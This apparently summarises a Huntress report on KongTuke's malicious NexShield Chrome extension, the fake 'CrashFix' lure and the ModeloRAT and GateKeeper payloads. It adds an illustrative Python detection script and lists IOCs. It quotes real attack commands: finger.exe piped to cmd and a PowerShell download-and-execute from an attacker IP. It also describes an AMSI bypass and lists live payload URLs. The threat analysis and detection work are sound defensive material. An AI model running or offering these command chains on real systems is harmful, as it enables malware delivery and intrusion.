KongTuke distributed a malicious Chrome extension (NexShield, typosquatting uBlock Origin Lite) that tracks installs via UUID beacons, delays execution, and triggers a browser denial-of-service while displaying a fake “CrashFix” popup to socially engineer victims. The campaign delivers a multi-stage infection chain—using finger.exe as a LOLBin, multi-layer PowerShell obfuscation and DGA domains, and culminating in ModeloRAT and a GateKeeper .NET payload with AES+XOR string encryption. #KongTuke #ModeloRAT
Keypoints
- NexShield is a typosquatting malicious Chrome extension that closely copies uBlock Origin Lite but replaces telemetry with attacker-controlled nexsnield[.]com and tracks users via UUID beacons during install, update, and uninstall.
- The extension delays malicious activity (60 minutes) using Chrome Alarms and then repeatedly executes a DoS payload that creates massive chrome.runtime port connections, exhausting browser resources and causing crashes.
- After forcing a browser crash, the extension shows a fake “CrashFix” popup with anti-analysis controls (blocks DevTools, right-click, text selection) to socially engineer victims into follow-up actions that deliver further payloads.
- KongTuke’s post-exploitation chain uses finger.exe as a LOLBin to fetch obfuscated PowerShell, which deobfuscates additional stages, downloads secondary payloads, and profiles the host (VM vs physical, domain-joined) before delivering final payloads.
- Domain-joined hosts receive ModeloRAT: a Python RAT with RC4-encrypted C2, registry persistence using HKCU Run keys, adaptive beaconing, file drop/randomized names, and hidden subprocess execution; non-domain hosts follow a heavily-obfuscated PowerShell path with DGA-driven staging.
- GateKeeper .NET payload employs two-layer string encryption (AES-256-CBC then XOR), extensive anti-analysis fingerprinting, and fileless .NET payload loading via in-memory decompression and reflection.
- Notable IOCs include NexShield extension ID, nexsnield[.]com telemetry domains, C2 IPs (including 199.217.98[.]108), multiple SHA256 hashes for payloads, a Dropbox link hosting ModeloRAT, and a developer email used in Chrome Store metadata.
MITRE Techniques
- [T1499] Endpoint Denial of Service – The extension implements a resource-exhausting loop creating chrome.runtime ports to crash the browser: ‘makeBatch() function attempts to iterate 1 billion times (1e9), with each iteration creating a new chrome.runtime port connection.’
- [T1204.001] User Execution (Social Engineering) – Uses a fake “CrashFix” popup and social engineering to trick users after crashing the browser: ‘fake “CrashFix” security warning’.
- [T1071.001] Application Layer Protocol: Web Protocols – C2 and telemetry use HTTP(S) web protocols for beacons and payload fetches: ‘hxxps://nexsnield[.]com/install?uuid=550e8400-e29b-41d4-a716-446655440000&version=2025.1116.1842’.
- [T1218] Signed Binary Proxy Execution (LOLBin) – Abuses the legitimate Windows utility finger.exe to fetch and execute remote payloads: ‘copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe [email protected][.]108|cmd’.
- [T1059.001] Command and Scripting Interpreter: PowerShell – Multiple stages use PowerShell for deobfuscation, download, and execution (Invoke-WebRequest and iex): ‘Invoke-WebRequest -Uri "hxxp://199.217.98[.]108/b" -OutFile "$env:APPDATA\script.ps1" & "$env:APPDATA\script.ps1" Remove-Item "$env:APPDATA\script.ps1"’.
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Uses cmd to run copy and piped remote execution: ‘cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe [email protected][.]108|cmd"’.
- [T1105] Ingress Tool Transfer – Downloads secondary payloads and executables over HTTP to disk (AppData/Temp): ‘downloads a secondary payload from the attacker’s server, saves it to the user’s AppData directory as script.ps1’.
- [T1547.001] Registry Run Keys / Startup Folder – ModeloRAT achieves persistence by writing to the HKCU Run key ‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MonitoringService’.
- [T1027] Obfuscated Files or Information – Extensive multi-layer obfuscation (ROT, Base64, XOR, AES) and string concatenation to hide IOCs: ‘multiple layers of Base64 encoding and XOR operations’.
- [T1497] Virtualization/Sandbox Detection – Fingerprinting checks distinguish VMs from real hosts and gate payload delivery based on a numeric fingerprint: ‘a legitimate victim machine would generate a fingerprint around 164 billion, while a VMware sandbox would produce approximately 88 billion’.
- [T1562.001] Impair Defenses: Disable or Modify Security Tools – AMSI bypass is performed by patching AmsiScanBuffer to immediately return, preventing script scanning: ‘overwrites it with 0xC3, a single RET instruction’.
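As an added defender-side illustration (this is not code from the Huntress report), the following Python rule set flags the execution-chain behaviours listed above over constructed Sysmon-style events; the sample IP, user name and paths are placeholders, not indicators from the report.

```python
import re

# Constructed sample endpoint events (Sysmon-like process creation and registry value set).
# 192.0.2.10, "alice" and the file paths are placeholders, not IOCs from the report.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe task@192.0.2.10|cmd"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c Invoke-WebRequest -Uri "http://192.0.2.10/b" -OutFile "$env:APPDATA\script.ps1"; & "$env:APPDATA\script.ps1"'},
    {"type": "registry", "image": r"C:\Users\alice\AppData\Local\Temp\aa.exe",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify47",
     "data": r"C:\Users\alice\AppData\Roaming\svc\update.exe"},
    # Benign events that must not fire: an ordinary copy and a Run key set by an installer.
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c copy C:\report.txt %temp%\report.bak"},
    {"type": "registry", "image": r"C:\Program Files\Vendor\setup.exe",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorUpdater",
     "data": r"C:\Program Files\Vendor\updater.exe"},
]

# Each rule: (description, MITRE technique, predicate over one event).
RULES = [
    ("finger.exe copied out of System32 (LOLBin staging)", "T1218",
     lambda e: e["type"] == "process"
               and re.search(r"copy\s+\S*finger\.exe\s+\S+", e["cmdline"], re.I) is not None),
    ("finger-style <user>@<host> query piped into cmd", "T1059.003",
     lambda e: e["type"] == "process"
               and re.search(r"\S+@\S+\s*\|\s*cmd\b", e["cmdline"], re.I) is not None),
    ("PowerShell download into APPDATA followed by execution", "T1059.001",
     lambda e: e["type"] == "process"
               and re.search(r"(Invoke-WebRequest|iwr)\b.*\$env:APPDATA.*(\biex\b|&\s*\")",
                             e["cmdline"], re.I) is not None),
    ("HKCU Run value pointing into a user-writable path", "T1547.001",
     lambda e: e["type"] == "registry"
               and "\\CurrentVersion\\Run\\" in e["target"]
               and re.search(r"\\AppData\\|\\Temp\\", e["data"], re.I) is not None),
]


def detect(events):
    """Return (description, technique, event index) for every rule that fires on each event."""
    hits = []
    for i, ev in enumerate(events):
        for desc, tid, pred in RULES:
            if pred(ev):
                hits.append((desc, tid, i))
    return hits


if __name__ == "__main__":
    for desc, tid, i in detect(SAMPLE_EVENTS):
        print(f"[{tid}] event {i}: {desc}")
```

The first sample event fires two rules (staging copy and the piped finger query), the benign copy and the Program Files Run value fire none.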
Indicators of Compromise
- [Domain] extension telemetry and C2 – nexsnield[.]com (primary telemetry/C2), fyvw2oiv[.]top (stage fetch), and other weekly DGA .top domains.
- [IP address] C2 and payload hosts – 199.217.98[.]108 (finger server queried by the copied finger.exe; hosts initial payloads), 170.168.103[.]208 and 158.247.252[.]178 (ModeloRAT C2 IPs).
- [Extension ID] malicious Chrome extension identifier – cpcdkmjddocikjdkbbeiaafnpdbdafmi (NexShield extension ID).
- [File URLs] payload download endpoints – hxxp://temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe (aa.exe download), hxxps://nexsnield[.]com/install?… (install beacon URL).
- [File hashes] known payload hashes – SHA256: fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 (aa.exe core payload), SHA256: 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4 (core extension background.js).
- [Registry key] persistence – HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MonitoringService (ModeloRAT persistence entry; the value name mimics legitimate software, with examples such as Spotify47 and Adobe2841 noted).
- [Files / Paths] local artifact examples – %TEMP%\aa.exe, $env:APPDATA\script.ps1, CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx (Chrome extension file).
- [Dropbox link] staging / payload hosting – https://www.dropbox[.]com/scl/fi/6gscgf35byvflw4y6x4i0/b1.zip?rlkey=bk2hvxvw53ggzhbjiftppej50&st=yyxnfu71&dl=1 (ModeloRAT hosting; SHA256: c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6).
- [Developer metadata] Chrome Store developer contact – [email protected] (registered email shown in extension metadata).
Read more: https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke